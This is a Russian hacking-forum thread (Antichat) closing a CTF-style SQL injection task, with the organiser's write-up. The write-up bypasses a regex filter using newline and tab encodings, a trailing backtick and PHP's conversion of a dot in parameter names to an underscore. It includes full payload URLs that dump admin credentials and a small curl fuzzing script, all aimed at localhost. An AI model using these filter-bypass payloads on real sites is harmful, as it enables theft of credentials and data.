Задание №1

Обсуждение в разделе «Задания/Квесты/CTF/Конкурсы», начал(-а) dooble, 26.07.2017.

  1. dooble

    dooble Reservists Of Antichat

    Регистрация:
    30.12.2016
    Сообщения:
    52
    Одобрения:
    86
    Репутация:
    17
    Прошло две недели.
    Окончен прием ответов от групп, итоги такие:
    - про МОА известно только то, что Кибер-панк жив и он в хорошей форме.
    - за РОА отдувался один crlf, упс проследил SooLFaa, с повышением.
    - lvl8 - основная ударная группа, лучшие.
    - из паблика прошел только Evan - public champion.

    Все молодцы и красавчики.
    Хорошая работа.

    ====

    Но задание не закрыто, продолжаем решать.
    Настало время подсказок, но поскольку одна уже прошла (backtik), пока просто разжуем то, что известно.

    Задание можно условно поделить на две части
    - получить вывод на экран
    - вывести данные из таблицы admin_site

    Начнем с вывода, мешает "хвост" запроса " and kmag=1".
    Задача давно известная и решается либо обрезанием хвоста (используем комментирование),
    либо достраиваем запрос до валидной конструкции.
    Комментарии детектятся фильтром, поэтому достраиваем.
    Поле kmag отсутствует в таблице admin_site, запрос валится, ну так залечим быстренько это недоразумение, проблема то совсем маленькая.

    ==
    И да, буду принимать и частичное прохождение:
    1 часть - получить вывод
    2 часть - протащить в запрос строку "admin_site"

    Проходить можно в любом порядке.
     
    #21 dooble, 10.08.2017
    В последний раз редактировалось: 10.08.2017
  2. dooble

    dooble Reservists Of Antichat

    Регистрация:
    30.12.2016
    Сообщения:
    52
    Одобрения:
    86
    Репутация:
    17
    Перестали поступать ответы, первая часть не требует каких то особых знаний, даже если не помните синтаксис MySQL, достаточно почитать базовые правила.

    Если кто то решает, отпишитесь в теме, или в личку.

    Или можно закрыть задание и посмотреть прохождения.
     
  3. Gorbachev

    Gorbachev Member

    Регистрация:
    23.03.2017
    Сообщения:
    41
    Одобрения:
    11
    Репутация:
    0
    Да, все варианты прохождения в деталях ОЧЕНЬ интересно посмотреть. Сам не осилил, но пытался.
    Как я понял из всего написанного, тут несколько разных вариантов обхода, вот их в деталях бы оценить.
     
    Это одобряет dooble.
  4. SooLFaa

    SooLFaa Reservists Of Antichat

    Регистрация:
    17.03.2014
    Сообщения:
    447
    Одобрения:
    410
    Репутация:
    129
    Вектор один. А кто как байпасит комменты не суть важно.
     
    _________________________
    Это одобряет Suicide.
  5. st55

    st55 Banned

    Регистрация:
    20.04.2016
    Сообщения:
    125
    Одобрения:
    130
    Репутация:
    32
    Наверное никто не будет против, если для тех, кто пытается пройти, я подскажу направление. Сам я не сразу додумался до решения, но один человек натолкнул меня на один .pdf файл.
     
    Это одобряют Gorev, seotor и cat1vo.
  6. Gorbachev

    Gorbachev Member

    Регистрация:
    23.03.2017
    Сообщения:
    41
    Одобрения:
    11
    Репутация:
    0
    Да меня собственно, больше всего интересует обход символа _ в регулярке.
     
  7. dooble

    dooble Reservists Of Antichat

    Регистрация:
    30.12.2016
    Сообщения:
    52
    Одобрения:
    86
    Репутация:
    17
    Подсказки даны достаточно хорошие, чтобы даже не решать, а просто записать ответ.
    Но при условии, что уже немного повтыкал.
     
    #27 dooble, 15.08.2017
    В последний раз редактировалось: 15.08.2017
  8. cat1vo

    cat1vo Level 8

    Регистрация:
    12.08.2009
    Сообщения:
    321
    Одобрения:
    222
    Репутация:
    84
    У них просто sqlmap не справляется, вот они и в тупике!
     
  9. dooble

    dooble Reservists Of Antichat

    Регистрация:
    30.12.2016
    Сообщения:
    52
    Одобрения:
    86
    Репутация:
    17
    Просто нет опыта решения задач и нужно некоторое количество разжеванных решений, некоторая начальная база, ступенька, опора.
    Дальше будет легче.
     
  10. seotor

    seotor New Member

    Регистрация:
    15.08.2017
    Сообщения:
    2
    Одобрения:
    1
    Репутация:
    1
    Спасибо за подсказку, теперь полностью решил :)
     
    Это одобряет dooble.
  11. dooble

    dooble Reservists Of Antichat

    Регистрация:
    30.12.2016
    Сообщения:
    52
    Одобрения:
    86
    Репутация:
    17
    Завтра закрою задание.
    Можно присылать полусырые ответы, главное чтобы можно было увидеть потенциал.
     
  12. Jup1ter_

    Jup1ter_ New Member

    Регистрация:
    27.11.2015
    Сообщения:
    19
    Одобрения:
    4
    Репутация:
    6
    Когда новый таск ждать?
     
  13. dooble

    dooble Reservists Of Antichat

    Регистрация:
    30.12.2016
    Сообщения:
    52
    Одобрения:
    86
    Репутация:
    17
    Пока не знаю.
    Не планировал ничего, был минутный порыв, отчасти внутренний протест против затянувшегося периода нехватки времени.

    Но полагаю, если будет интерес, в группах его поддержат обязательно.
    Возможно и у меня получится.
     
  14. dooble

    dooble Reservists Of Antichat

    Регистрация:
    30.12.2016
    Сообщения:
    52
    Одобрения:
    86
    Репутация:
    17
    Задание закрыто

    Постараюсь дать более подробное объяснение, чем принято в заданиях, поскольку хочется показать, что никакая это не уличная магия и не развлекаловка исключительно для групп.
    Обычная задачка, доступная всякому, освоившему синтаксис мускула и php, и умеющему мыслить логически.
    Ну, может быть, иногда нужно включать хакерскую догадку, если конкретных знаний пока недостаточно.

    Задание можно разбить на две подзадачи:
    - получить вывод информации через SQLi
    - вывести информацию, уже конкретно из таблицы admin_site

    Смотрим запрос
    Code:
    $sql="select tovar, dataprice, cena from pricelist where $key = $id and kmag=1";
    Инъекция возможна в переменные $_GET['$key'] и $_GET['$id'].
    Нам привычнее крутить тут
    Code:
    select tovar, dataprice, cena from pricelist where $key = {SQLi} and kmag=1
    т.е. вызов будет выглядеть так:
    Code:
    http://localhost/test.php?id={SQLi}
    поехали
    Code:
    http://localhost/test.php?id=0 union select 1,2,3
    (далее буду писать только ту часть, что начинается со знака вопроса)
    сработает фильтр на пробел
    Code:
    if(preg_match("|[\[ _\-\]\*(]+|ims", $_SERVER['QUERY_STRING'].urldecode($_SERVER['QUERY_STRING'])))die("Hacking attempt");
    тогда заменим пробел на варианты из %09 ,%0а, %0b, %0d
    Code:
    ?id=0%0aunion%0aselect%0a1,2,3
    select tovar, dataprice, cena from pricelist where id = 0 union select 1,2,3 and kmag=1
    запрос невалидный, мешает участок " and kmag=1", поле kmag отсутствует в запросе union select.
    Его нужно отрезать комментариями, или достроить до валидного.
    Штатные комментарии фильтром запрещены ("-- ","#", "/**/", и даже нештатный ";%00"), поэтому достраиваем запрос.
    Я пытался подтолкнуть к использованию backtick "`", как эффективного и красивого аналога многострочного комментария и незаслуженно "забытого" в паблике ачата.
    Code:
    ?id=0%0aunion%0aselect%0a1,2,3`
    select tovar, dataprice, cena from pricelist where id = 0 union select 1,2,3` and kmag=1
    В данном случае, все, что идет после обратной кавычки до конца строки (в т.ч. и символы \r\n) будет воспринято, как алиас поля 3, поскольку закрывающая кавычка отсутствует, что эквивалентно действию многострочного комментария.
    т.е. даже если запрос был бы многострочным
    Code:
    $sql="select tovar, dataprice, cena
                from pricelist where $key = $id
                                    and kmag>0
                                    and kmag<2";
    backtick его бы отрезал аналогично действию
    Code:
    $sql="select tovar, dataprice, cena
                from pricelist where $key = {SQLi}/* $id
                                    and kmag>0
                                    and kmag<2 */";
    На рдоте такую тему обсуждали, в т.ч. и мемберы ачата.

    Или используем вполне себе обычный способ, достраиваем так, чтобы запрос не ломался.
    Code:
    ?id=0%0aunion%0aselect%0a1,2,3%0afrom%0apricelist%0awhere%0a1
    select tovar, dataprice, cena from pricelist where id = 0 union select 1,2,3 from pricelist where 1 and kmag=1
    Итак, появился вывод
    Code:
    | 2 | 1 | 3 |
    Отлично, теперь достанем поля из таблицы admin_site.
    Но тут попадаем на конкретный облом, в названии таблицы присутствует символ нижнего подчеркивания "_", который детектится фильтром
    и в настоящее время нет возможности его обойти, по крайней мере никто публично не заявил, что смог это сделать.
    На форуме вопрос с фильтрацией "_" тоже неоднократно поднимался и вывод пока один - в общем случае не обходится никак.
    Что за подвох, задание обязано иметь решение, значит обход все же найден, ладно повтыкаем.
    На сколько хватит нашего терпения: на час, на два на день, или больше, не очень важно, главное приходим к выводу - не обходится.

    Вторая часть.
    Еще раз смотрим, чего то пропустили.
    Да почти ничего, разве что сделали допущение - без разницы, в какую переменную делать инъекцию.
    foreach($_GET as $key=>$id){
    (Здесь $key определяет имя переменной, а $id - ее значение.)
    И тут либо вспоминаем эту разницу, либо методом хакерского тыка проверяем инъекцию в $_GET['key'].
    А разница действительно есть и она даже описана в документаци к php http://php.net/manual/ru/language.variables.external.php
    Смысл в том, что в именах переменных (но не в значениях), переданных через массивы $_GET и $_POST некоторые символы запрещены и преобразуются к знаку подчеркивания "_".
    А символы эти - пробел, левая квадратная скобка и точка (" ", "[", ".").

    Фигасе! То, что нужно!
    Пробел и скобку фильтр детектит, а вот точку пропускает, поэтому окончательный вызов будет таким.
    Code:
    http://localhost/test.php?0%0aunion%0aselect%0apassword,user,email%0afrom%0aadmin.site`=xek
    (здесь "=xek" не несет смысловой нагрузки, просто смайлик ;))
    запрос приобрел вид
    Code:
    select tovar, dataprice, cena from pricelist where 0 union select password,user,email from admin_site` = xek and kmag=1
    и вернул нужные данные из admin_site
    Code:
    | admin | *4414E26EDED6D661B5386813EBBA95065DBC4728 | webmaster@localhost |
    В условиях, когда backtik перестал работать на новых версиях мускула (во всей линейке 5.7), можно достроить запрос таким образом, чтобы хвост "and kmag=1"
    не приводил к ошибке выполнения запроса.
    В таблице admin_site нет поля "kmag", поэтому запрос валится, но такое поле есть в pricelist, поэтому тем, или иным способом добавим таблицу в запрос и достроим до валидного.
    Например так:
    Code:
    http://localhost/test.php?0%09union%09select%09password,user,email%09from%09admin.site,pricelist%09where%091=1
    соответственно запрос приобрел вид
    Code:
    select tovar, dataprice, cena from pricelist where 0 union select password,user,email from admin_site,pricelist where 1 = 1 and kmag=1
    и уже выполняется нормально.

    Как искать, когда не знал или не помнил это правило?
    Гугл: "php переменная get подчеркивание".

    Или сразу - метод хакерского тыка, можно и более надежное средство - фаззер (кто не знаком, обязательно освойте).
    Обычно в проблемное место вставляют вывод генератора из 1-3 символов.
    Как вариант, свой скрипт быстренько накидать.
    Code:
    <?
    $u1 = 'http://localhost/test.php?0    union    select    password,user,email    from    admin';
    $u2='site,pricelist%09where%091=1';
    $ch = curl_init();
    for ($i=0;$i<256;$i++){
        curl_setopt_array($ch, array(
            CURLOPT_URL => $u1.chr($i).$u2,
            CURLOPT_RETURNTRANSFER => 1,
        ));
        $r = curl_exec($ch);
        if(stripos($r,'admin')>0)    echo $i,"<br>",chr($i),"<br>",$r;
    }
    curl_close($ch);

    Про backtik.
    К сожалению этот удобный способ отходит в историю, как в свое время ушел незакрытый комментарий "/*".
    Видимо патчили тут
    https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-29.html
    https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-11.html
    https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-1.html
    Replication: Backtick (`) characters were not always handled correctly in internally generated SQL statements, which could sometimes lead to errors on the slave. (Bug #16084594, Bug #68045)
    References: This issue is a regression of: Bug #14548159, Bug #66550.

    И остался еще один интересный вопрос, каким образом точка с запятой ";" делает запрос валидным (смотрим прохождения ниже).
    Не понимаю, как это работает.
    Это точно не php и не mysql.
    Есть подозрение, что-то дополнительно обрабатывает запрос, возможно предпроцессор какой то оптимизирует строку запроса.
    Очень хотелось бы разобраться в причине такого аномального поведения, как минимум, двух серверов.
    Во первых, нужно понимать причину аномалии и условия возникновения.
    Во вторых, около этого могут находится и другие интересные эффекты.
    Может владельцы помогут прояснить причину.

    Прохождения:
     
    #34 dooble, 23.08.2017
    В последний раз редактировалось: 23.08.2017
  15. Gorbachev

    Gorbachev Member

    Регистрация:
    23.03.2017
    Сообщения:
    41
    Одобрения:
    11
    Репутация:
    0
    Задание безусловно, безусловно интересное. В первую очередь благодарю за детально описанные решения, причем несколько.
    Но, говорить, что всё это очевидные вещи понятные новичкам... В общем мне это напомнило вот такое обсуждение: https://rdot.org/forum/showthread.php?t=741
    Ситуация аналогичная имхо, тем более что уважаемый dooble не понял трюк с ; хотя для некоторых он тоже очевиден.
     
  16. dooble

    dooble Reservists Of Antichat

    Регистрация:
    30.12.2016
    Сообщения:
    52
    Одобрения:
    86
    Репутация:
    17
    Если имеется ввиду не расщепление запросов (что не может служить терминатором, вот при mq=off работало в связке с ";%00"), то большая просьба объяснить феномен.

    Давайте разжуем.
    MySQL поддерживает расщепление запросов (можно проверить в консольном клиенте), но клиент php должен обратиться, как
    Code:
    mysqli::multi_query()
    mysqli_multi_query () 
    Смотрим http://www.php.net/manual/ru/mysqli.multi-query.php
    а в скрипте идет обычное $db->query($sql) и если после ";" будет продолжение строки то восприниматься будет, как ошибка, встретился "конец запроса", а следом идет опровержение, текст запроса продолжается.

    Но и в случае mysqli_multi_query () запросы должны быть валидные, а мы после ";" передаем мусор, который мускул не сможет обработать и вывалит ошибку синтаксиса.

    Т.е. на этих серверах "нечто" убирает этот мусор, перед тем, как отдать на выполнение СУБД.
    Либо существует настройка мускула (о которой я не знаю) и она позволяет обрабатывать запрос только до ";".

    Версия на обоих аномальных серверах - 10.1.20-MariaDB, поднимал ее локально для проверки, в конфигурации из коробки реагирует на мусор после ";" привычной ошибкой.
     
    #36 dooble, 23.08.2017
    В последний раз редактировалось: 23.08.2017
  17. Gorbachev

    Gorbachev Member

    Регистрация:
    23.03.2017
    Сообщения:
    41
    Одобрения:
    11
    Репутация:
    0
    dooble, я предполагаю, что все гораздо проще, сейчас возможно кто нибудь скинет ссылку на документацию мускуля или php, где будет всё просто и понятно, возможно с аналогичной формулировкой, мол вы разве такую элементарность не знали?
    Ещё раз благодарю за квест, столько нового разом узнал. Я вообще ничего этого не знал, ни про ` ни про замену [ или точки на _, и уж тем более про ; а тут сколько нового.
    Подобные квесты, когда их суть сводится к полуприватным(назовем это так) техникам, очень полезны, но иногда чуток бомбит, когда делаются заявления, что это очевидно. Очевидно для того, кто читая мануалы мускуля или php случайно находит какую нибудь фичу, которую можно использовать для байпассов... Ну ссылку на подобные рассуждения на рдоте я кидал.
     
    Это одобряет dooble.
  18. Veil

    Veil Well-Known Member

    Регистрация:
    21.05.2015
    Сообщения:
    1 691
    Одобрения:
    2 413
    Репутация:
    48
    Это правильное разжевывание. Одорямс.)))) Главное показать направление. Это отличный ход.
     
    Это одобряет dooble.
  19. ghost8

    ghost8 Member

    Регистрация:
    29.05.2015
    Сообщения:
    94
    Одобрения:
    15
    Репутация:
    0
    Спасибо за задание,как говорится все проще если вдуматься,но полез куда сложнее))
    КрасавчиГ что делаешь такое,
    Респект и Уважуха
     
Загрузка...